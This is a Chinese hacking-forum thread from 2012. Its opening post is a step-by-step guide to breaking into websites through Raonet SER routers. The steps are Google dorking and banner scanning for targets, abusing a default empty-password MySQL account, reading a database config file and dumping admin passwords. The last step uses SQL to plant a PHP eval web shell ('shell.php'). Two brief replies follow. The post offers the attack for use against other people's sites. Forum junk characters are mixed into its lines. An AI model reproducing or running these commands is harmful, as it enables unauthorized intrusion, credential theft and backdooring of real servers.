找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3022|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
# N7 C4 q# x% `) ^0 o
! s) Q& x: b, t  R$ Q2 }1:google搜索'Raonet Subscriber Ethernet Router'' c/ ]  W7 h' [

6 g  y' R6 \  v2 v: r2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20017 P7 K: a5 V5 {1 d$ x3 D5 T7 G
& a+ ]) ]  q- t$ I6 A$ F' w
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
; l- l8 R7 S1 J; j+ m2 w1 {0 q8 u' C3 X, m3 K
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......- q& Z  i7 }( Y* X3 D: n/ z6 y

9 _7 s6 T3 ]& l1 W: g1 V ) e4 F  K. c4 V% H/ n
9 X! ~% e& ~- v/ z2 i7 \+ ~3 \4 g
入侵步骤:
- E! ]6 e0 t1 O$ M/ u2 @( V* O
" ~+ D# A: [) d1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
6 j* e" g3 |* S6 L+ u
8 i# F8 ~6 u$ L& D2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc6 o3 K5 j/ a! F2 Z" X
3:得到密码后连接,查看GUI管理密码:& J9 J5 C; l4 B
use ser_500
9 ~  o1 a# o6 _# G6 r' P8 y9 bselect id,passwd from user;, H& D8 E* c$ Z- @" }$ |- Z; x
4:通过数据库写入webshell,执行命令:
( K1 S0 o1 X$ h+ @$ \" |5 z5 Huse mysql;
: z% s& \- B+ W9 `) }" G% A4 Mcreate table ok(cmd TEXT);
+ S/ V* G0 y8 w8 P6 {% J7 Linsert into ok values("<?php @eval($_POST[cmd])?>");
; K/ M% y/ g) f% M/ S6 eselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";/ s) U5 {) M' J1 g- U2 x1 J
drop table ok;
" O, \$ t( t: K7 Q* D5 ^9 t$ T6 U& N4 O* Q, R
5:连接后门shell.php 4 a9 {6 X7 B4 K2 q" A, i. B7 m( Q; M
2 L: q/ b8 |# h( }, X* R
6. 搞定!
& k: x, y  f9 _% y  `3 G
4 K/ I& A: g7 k1 k+ I5 B: j
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表